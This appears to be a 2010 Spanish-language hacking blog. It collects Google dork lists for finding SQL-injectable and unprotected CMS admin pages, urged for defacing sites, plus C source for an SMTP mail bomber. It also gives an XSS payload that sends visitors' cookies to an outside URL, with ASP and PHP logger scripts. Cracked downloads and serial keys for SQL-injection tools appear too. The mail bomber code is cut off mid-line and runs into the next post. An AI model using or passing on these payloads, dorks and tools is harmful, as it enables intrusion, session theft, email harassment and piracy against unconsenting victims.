| Mobile| RSS

Google dorks sql injection mas

Google dorks sql injection: 
inurl:index.php?id=   
inurl:trainers.php?id=   
inurl:buy.php?category=   
inurl:article.php?ID=   
inurl:Play_old.php?id=   
inurl:declaration_more.php?decl_id=   
inurl:Pageid=   
inurl:games.php?id=   
inurl:Page.php?file=   
inurl:newsDetail.php?id=   
inurl:gallery.php?id=   
inurl:article.php?id=   
inurl:show.php?id=   
inurl:staff_id=   
inurl:newsitem.php?num=   
inurl:readnews.php?id=   
inurl:top10.php?cat=   
inurl:historialeer.php?num=   
inurl:reagir.php?num=   
inurl:Stray-Questions-View.php?num=   
inurl:forum_bds.php?num=   
inurl:game.php?id=   
inurl:view_product.php?id=   
inurl:newsone.php?id=   
inurl:sw_comment.php?id=   
inurl:news.php?id=   
inurl:avd_start.php?avd=   
inurl:event.php?id=   
inurl:Product-item.php?id=   
inurl:sql.php?id=   
inurl:news_view.php?id=   
inurl:select_biblio.php?id=   
inurl:humor.php?id=   
inurl:aboutbook.php?id=   
inurl:fiche_spectacle.php?id=   
inurl:communique_detail.php?id=   
inurl:sem.php3?id=   
inurl:kategorie.php4?id=   
inurl:news.php?id=   
inurl:index.php?id=   
inurl:faq2.php?id=   
inurl:show_an.php?id=   
inurl:Preview.php?id=   
inurl:loadpsb.php?id=   
inurl:Opinions.php?id=   
inurl:spr.php?id=   
inurl:Pages.php?id=   
inurl:announce.php?id=   
inurl:clanek.php4?id=   
inurl:Participant.php?id=   
inurl:download.php?id=   
inurl:main.php?id=   
inurl:review.php?id=   
inurl:chappies.php?id=   
inurl:read.php?id=   
inurl:Prod_detail.php?id=   
inurl:viewphoto.php?id=   
inurl:article.php?id=   
inurl:Person.php?id=   
inurl:Productinfo.php?id=   
inurl:showimg.php?id=   
inurl:view.php?id=   
inurl:website.php?id=   
inurl:hosting_info.php?id=   
inurl:gallery.php?id=   
inurl:rub.php?idr=   
inurl:view_faq.php?id=   
inurl:artikelinfo.php?id=   
inurl:detail.php?ID=   
inurl:index.php?=   
inurl:Profile_view.php?id=   
inurl:category.php?id=   
inurl:Publications.php?id=   
inurl:fellows.php?id=   
inurl:downloads_info.php?id=   
inurl:Prod_info.php?id=   
inurl:shop.php?do=part&id=   
inurl:Productinfo.php?id=   
inurl:collectionitem.php?id=   
inurl:band_info.php?id=   
inurl:Product.php?id=   
inurl:releases.php?id=   
inurl:ray.php?id=   
inurl:Produit.php?id=   
inurl:Pop.php?id=   
inurl:shopping.php?id=   
inurl:Productdetail.php?id=   
inurl:Post.php?id=   
inurl:viewshowdetail.php?id=   
inurl:clubpage.php?id=   
inurl:memberInfo.php?id=   
inurl:section.php?id=   
inurl:theme.php?id=   
inurl:Page.php?id=   
inurl:shredder-categories.php?id=   
inurl:tradeCategory.php?id=   
inurl:Product_ranges_view.php?ID=   
inurl:shop_category.php?id=   
inurl:transcript.php?id=   
inurl:channel_id=   
inurl:item_id=   
inurl:newsid=   
inurl:trainers.php?id=   
inurl:news-full.php?id=   
inurl:news_display.php?getid=   
inurl:index2.php?option= 
inurl:readnews.php?id=   
inurl:top10.php?cat=   
inurl:newsone.php?id=   
inurl:event.php?id=   
inurl:Product-item.php?id=   
inurl:sql.php?id=   
inurl:aboutbook.php?id=   
inurl:review.php?id=   
inurl:loadpsb.php?id=   
inurl:ages.php?id=   
inurl:material.php?id=   
inurl:clanek.php4?id=   
inurl:announce.php?id=   
inurl:chappies.php?id=   
inurl:read.php?id=   
inurl:viewapp.php?id=   
inurl:viewphoto.php?id=   
inurl:rub.php?idr=   
inurl:galeri_info.php?l=   
inurl:review.php?id=   
inurl:iniziativa.php?in=   
inurl:curriculum.php?id=   
inurl:labels.php?id=   
inurl:story.php?id=   
inurl:look.php?ID=   
inurl:newsone.php?id=   
inurl:aboutbook.php?id=   
inurl:material.php?id=   
inurl:Opinions.php?id=   
inurl:announce.php?id=   
inurl:rub.php?idr=   
inurl:galeri_info.php?l=   
inurl:tekst.php?idt=   
inurl:newscat.php?id=   
inurl:newsticker_info.php?idn=   
inurl:rubrika.php?idr=   
inurl:rubp.php?idr=   
inurl:Offer.php?idf=   
inurl:art.php?idm=   
inurl:title.php?id=

sábado, 22 de mayo de 2010 | Tags: | 191 comentario [ Mas... ]

real mail Bomber


.:-[ This is a M3x and Shp Mail bomber }-:.
 
disclaimer: Me (M3x and Shp are not liable or responcible with watever shit you get yourself into
            this file is for everyone, plz make sure to keep the recognition to its creators. this is the only copy of this, if you want to make any adjustments to this plz message me at tjmax007[at]hotmail[dot]com
            
         

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
 
#define PORT_SMTP 25
 
typedef struct socketClient_s {
    int socket;
    struct sockaddr_in to;
} socketClient_t;
 
void syntax(char *nameProgram);
int fetchArguments(int argc, char *argv[], char *host[], char *to[], char *messageFileName[], char *subject[], char *from[], char *port[], char *messagesNumber[]);
void freeArguments(char *host, char *to, char *messageFileName, char *subject, char *from, char *port, char *messagesNumber);
int socketConfiguration(socketClient_t *client, char *host, char *port);
int spamming(socketClient_t *client, char *to, char *messageFileName, char *subject, char *from, char *port, char *messagesNumber);
void readAscii(char *buffer);
int socketClientRead(socketClient_t *client, char *answer, int taille);
void socketClientFree(socketClient_t *client);
 
int main(int argc, char *argv[]) {
    char *host = NULL;
    char *to = NULL;
    char *messageFileName = NULL;
    char *subject = NULL;
    char *from = NULL;
    char *port = NULL;
    char *messagesNumber = NULL;
    socketClient_t *client = NULL;
 
    if(argc < 4)
        syntax(argv[0]);
 
    if(fetchArguments(argc,argv,&host,&to,&messageFileName,&subject,&from,&port,&messagesNumber) == -1) { // mallocs
        fprintf(stderr,"[-]Problem while fetchArguments()\n");
        return EXIT_FAILURE;
    }
 
    printf("[+]Welcome on shp's mailbomber\n");
 
    client = (socketClient_t *) malloc(sizeof(socketClient_t));
    if(!client) {
        fprintf(stderr,"[-]Problem while malloc()\n");
        return -1;
    }
 
    if(socketConfiguration(client,host,port) == -1) {
        fprintf(stderr,"[-]Problem while socketConfiguration()\n");
        socketClientFree(client);
        return -1;
    }
 
    if(spamming(client,to,messageFileName,subject,from,port,messagesNumber) == -1) {
        fprintf(stderr,"[-]Problem while spamming()\n");
        return -1;
    }
 
    socketClientFree(client);
    freeArguments(host,to,messageFileName,subject,from,port,messagesNumber);
 
    return EXIT_SUCCESS;
}
 
void syntax(char *nameProgram) {
    /* We display this function if the syntax is not correct */
    printf("[+]Usage: %s [host] [to] [messageFileName] [options]\n",nameProgram);
    printf("[+]\thost => Name of the smtp server to use\n");
    printf("[+]\tto => target email adress\n");
    printf("[+]\tmessageFileName => the name of the file which contains the mail message\n");
    printf("[+]Options:\n");
    printf("[+]\t-f [From] => Specify the sender\n");
    printf("[+]\t-h [Help] => Display this menu\n");
    printf("[+]\t-n [Messages Number] => Number of mails to send (1 by default)\n");
    printf("[+]\t-p [Port] => Specify the smtp server port (25 by default)\n");
    printf("[+]\t-s [Subject] => Specify the subject of the mail\n");
    printf("[+]Example: %s smtp.tapz.org target@hotmail.com message.txt -n 9999 -s Important -f hacker@jabber.org\n",nameProgram);
    exit(EXIT_FAILURE);
}
 
int fetchArguments(int argc, char *argv[], char *host[], char *to[], char *messageFileName[], char *subject[], char *from[], char *port[], char *messagesNumber[]) {
    /* This function is going to fetch arguments of the program */
    int i;
    int lenArgv;
 
    /* Fetching "Host" */
    lenArgv = strlen(argv[1]);
    if(lenArgv > 29) { // Max-length for this array is 30
        fprintf(stderr,"[-]First Argument (host) is too long\n");
        return -1;
    }
    else {
        *host = (char *) malloc((lenArgv +1) * sizeof(char));
        if(!*host) {
            fprintf(stderr,"[-]Problem while malloc()\n");
            return -1;
        }
    }
 
    strncpy(*host,argv[1],lenArgv);
    host[0][lenArgv + 1] = '\0';
 
    /* Fetching "To" */
    lenArgv = strlen(argv[2]);
    if(lenArgv > 29) { // Max-length for this array is 30
        fprintf(stderr,"[-]Second Argument (to) is too long\n");
        return -1;
    }
    else {
        *to = (char *) malloc((lenArgv + 1) * sizeof(char));
        if(!*to) {
            fprintf(stderr,"[-]Problem while malloc()\n");
            return -1;
        }
    }
 
    strncpy(*to,argv[2],lenArgv);
    to[0][lenArgv + 1] = '\0';
 
    /* Fetching "MessageFile" */
    lenArgv = strlen(argv[3]);
    if(lenArgv > 29) { // Max-length for this array is 30
        fprintf(stderr,"[-]Third Argument (MessageFile) is too long\n");
        return -1;
    }
    else {
        *messageFileName = (char *)malloc((lenArgv + 1) * sizeof(char));
        if(!*messageFileName) {
            fprintf(stderr,"[-]Problem while malloc()\n");
            return -1;
        }
    }
 
    strncpy(*messageFileName,argv[3],lenArgv);
    messageFileName[0][lenArgv + 1] = '\0';
 
    /* Fetching optinal arguments */
    for(i=1;i
        if(strcmp(argv[i],"-n") == 0) {
            lenArgv = strlen(argv[i+1]);
 
            if(lenArgv > 5) {
                fprintf(stderr,"[-]Messages Number is too long\n");
                return -1;
            }
            else {
                *messagesNumber = (char *) malloc((lenArgv + 1) * sizeof(char));
                if(!*messagesNumber) {
                    fprintf(stderr,"[-]Problem while malloc()\n");
                    return -1;
                }
            }
 
            strncpy(*messagesNumber,argv[i+1],lenArgv);
            messagesNumber[0][lenArgv + 1] = '\0';
 
        }
 
        if(strcmp(argv[i],"-s") == 0) {
            lenArgv = strlen(argv[i+1]);
 
            if(lenArgv > 19) {
                fprintf(stderr,"[-]Subject is too long\n");
                return -1;
            }
            else {
                *subject = (char *) malloc((lenArgv + 1) * sizeof(char));
                if(!*subject) {
                    fprintf(stderr,"[-]Problem while malloc()\n");
                    return -1;
                }
            }
 
            strncpy(*subject,argv[i+1],lenArgv);
            subject[0][lenArgv + 1] = '\0';
        }
 
        if(strcmp(argv[i],"-f") == 0) {
            lenArgv = strlen(argv[i+1]);
 
            if(lenArgv > 29) {
                fprintf(stderr,"[-]From is too long\n");
                return -1;
            }
            else {
                *from = (char *) malloc((lenArgv + 1) * sizeof(char));
                if(!*from) {
                    fprintf(stderr,"[-]Problem while malloc()\n");
                    return -1;
                }
            }
 
            strncpy(*from,argv[i+1],lenArgv);
            from[0][lenArgv + 1] = '\0';
 
        }
 
        if(strcmp(argv[i],"-p") == 0) {
            lenArgv = strlen(argv[i+1]);
 
            if(lenArgv > 5) {
                fprintf(stderr,"[-]Port is too long\n");
                return -1;
            }
            else {
                *port = (char *) malloc((lenArgv + 1) * sizeof(char));
                if(!*port) {
                    fprintf(stderr,"[-]Problem while malloc()\n");
                    return -1;
                }
            }
 
            strncpy(*port,argv[i+1],lenArgv);
            port[0][lenArgv + 1] = '\0';
        }
 
        if(strcmp(argv[i],"-h") == 0)
            syntax(argv[0]);
 
    }
 
    return 0;
}
 
void freeArguments(char *host, char *to, char *messageFileName, char *subject, char *from, char *port, char *messagesNumber) {
    /* This function frees arguments mallocs */
    if(host)
        free(host);
    if(to) 
        free(to);
    if(messageFileName)
        free(messageFileName); 
    if(subject) 
        free(subject);
    if(from)
        free(from);
    if(port)
        free(port);
    if(messagesNumber)
        free(messagesNumber);
 
}
 
int socketConfiguration(socketClient_t *client, char *host, char *port) {
    /* This function configurate the client socket */
    struct hostent *hostInfo = NULL;
    int ret;
    char *ip = NULL;
 
    client->socket = socket(AF_INET,SOCK_STREAM,0);
    client->to.sin_family = AF_INET;
    if(!port)
        client->to.sin_port = htons(PORT_SMTP);
    else {
        char *check = NULL;
        client->to.sin_port = htons(strtol(port,&check,0));
        if(*check != '\0') {
            fprintf(stderr,"[-]Bad port\n");
            return -1;
        }
    }
 
    hostInfo = gethostbyname(host);
    if(!hostInfo) {
        fprintf(stderr,"[-]Problem while gethostbyname()\n");
        return -1;
    }
 
    ip = inet_ntoa(*(struct in_addr *)(hostInfo->h_addr_list[0]));
    client->to.sin_addr.s_addr = inet_addr(ip);
 
    ret = connect(client->socket,(struct sockaddr *)&client->to,sizeof(client->to));
    if(ret == -1) {
        fprintf(stderr,"[-]Problem while connect()\n");
        return -1;
    }
 
 
    return 0;
}
 
int spamming(socketClient_t *client, char *to, char *messageFileName, char *subject, char *from, char *port, char *messagesNumber) {
    /* This function is gonna mailbomb the target */
    char answer[100];
    int j;
    int i;
    int ret;
    char *mailFrom = NULL;
    char *rcptTo = NULL;
    FILE* messageFile = NULL;
    char *message = NULL;
    char *ptr = NULL;
    int number;
    char *check = NULL;
    int lenSubject;
 
    if(!messagesNumber)
        number = 1;
    else {
        number = strtol(messagesNumber,&check,0);
        if(*check != '\0') {
            fprintf(stderr,"Bad messages number format\n");
            return -1;
        }
    }
 
    /* Home Message */
    if(socketClientRead(client,answer,100) == -1)
        return -1;
 
        printf("%s\n",answer);
 
    /* EHLO */
    ret = send(client->socket,"EHLO tapz\r\n",11,0);
    if(ret == -1) {
        fprintf(stderr,"[-]Problem while send()\n");
        return -1;
    }
 
    if(socketClientRead(client,answer,100) == -1)
        return -1;
 
    readAscii(answer);
 
    if(socketClientRead(client,answer,100) == -1)
        return -1;
 
    for(j=1;j<=number;j++) {
        /* MAIL FROM */
        if(from)
            mailFrom = (char *) malloc((strlen(from) + 1 + 21) * sizeof(char));
        else
            mailFrom = (char *) malloc(34 * sizeof(char));
        if(!mailFrom) {
            fprintf(stderr,"[-]Problem while malloc()\n");
            return -1;
        }
 
        if(from)
            snprintf(mailFrom,strlen(from) + 21,"MAIL FROM:

XSS cookie

script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>

news.asp:
<%
msg=Request.ServerVariables("QUERY_STRING")    
testfile=Server.MapPath("cook.txt")    
set fs=server.CreateObject("scripting.filesystemobject")    
set thisfile=fs.OpenTextFile(testfile,8,True,0)    
thisfile.Writeline(""&msg& "")    
thisfile.close    
set fs = nothing    
%>

PHP:
<?php 
$cookie = $_GET['c']; 
$ip = getenv ('REMOTE_ADDR'); 
$time=date("j F, Y, g:i a"); 
$referer=getenv ('HTTP_REFERER'); 
$fp = fopen('cook.txt', 'a'); 
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>'); 
fclose($fp); 
?>

Pangolin professinal edition 3.0.0.1016 completo &kegen

http://www.multiupload.com/1GOVXOQKF6
http://hotfile.com/dl/43882237/91a2f8d/Pangolin_professinal_edition3.0.0.1016_amp_keyen.rar.html
http://www.zshare.net/download/76323277a3cf14a0/

http://www.badongo.com/file/22785978
 http://uploading.com/files/47981f24/Pangolin_professinal_edition3.0.0.1016_amp_keyen.rar/
http://www.2shared.com/file/nPoQ9PDF/Pangolin_professinal_edition30.html
http://www.megaupload.com/?d=XHNZTOUJ

password:www.shell2me.com 


图片:3.0.0.1016.jpg



jueves, 20 de mayo de 2010 | Tags: | 4 comentario [ Mas... ]

CMS - ("Content Management System ") - 0wn3d by PoisonCode

CMS - ("Content Management System ") - 0wn3d by PoisonCode


hola gente hoy me puse a hacer busquedas avanzadas con google para acceder a algunos paneles de administracion de el CMS ("Content Management System") por medio de la web la cual accedemos al panel de administracion sin ingresar User y Password de admin podemos editar la web y encontre unas cuantas aqui les dejo dorks para que deface algunas webs.

Dorks: allinurl: /admin/menu.php?id=
allinurl: /cms/admin/index.php?id=
allinurl: /admin/editar.php?id=

miércoles, 19 de mayo de 2010 | Tags: | 0 comentario [ Mas... ]

nuevo SQL Injection Dorks 2010


New SQL Injection Dorks

allinurl: \"index php go buy\"
allinurl: \"index.php?go=sell\"
allinurl: \"index php go linkdir\"
allinurl: \"index.php?go=resource_center\"
allinurl: \"resource_center.html\"
allinurl: \"index.php?go=properties\"
allinurl: \"index.php?go=register\"

domingo, 16 de mayo de 2010 | Tags: | 1 comentario [ Mas... ]

WebCruiser Enterprise Edition




* Crawler(Site Directories And Files);
* Vulnerability Scanner(SQL Injection, Cross Site Scripting);
* POC(Proof of Concept): SQL Injection and Cross Site Scripting;
* GET/Post/Cookie Injection;
* SQL Server: PlainText/FieldEcho(Union)/Blind Injection;
* MySQL/Oracle/DB2/Access: FieldEcho(Union)/Blind Injection;
* Administration Entrance Search;
* Password Hash of SQL Server/MySQL/Oracle Administrator;
* Time Delay For Search Injection;
* Auto Get Cookie From Web Browser For Authentication;
* Multi-Thread;
* Adcanced:Proxy,Escape Filter;
* Report Output.


Username: WWW
Serial : 3E08-3C1B-CAFB-321F

Username:st0p.org
Serial :9EF6-CC8C-F068-B1D6

Bayram hediyesi.
http://rs348.rapidshare.com/files/382664449/WebCruiserEnt.rar
UserGuide

Havij 1.08 + Pangolin Pro 3 + MySQLi Dump 3

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter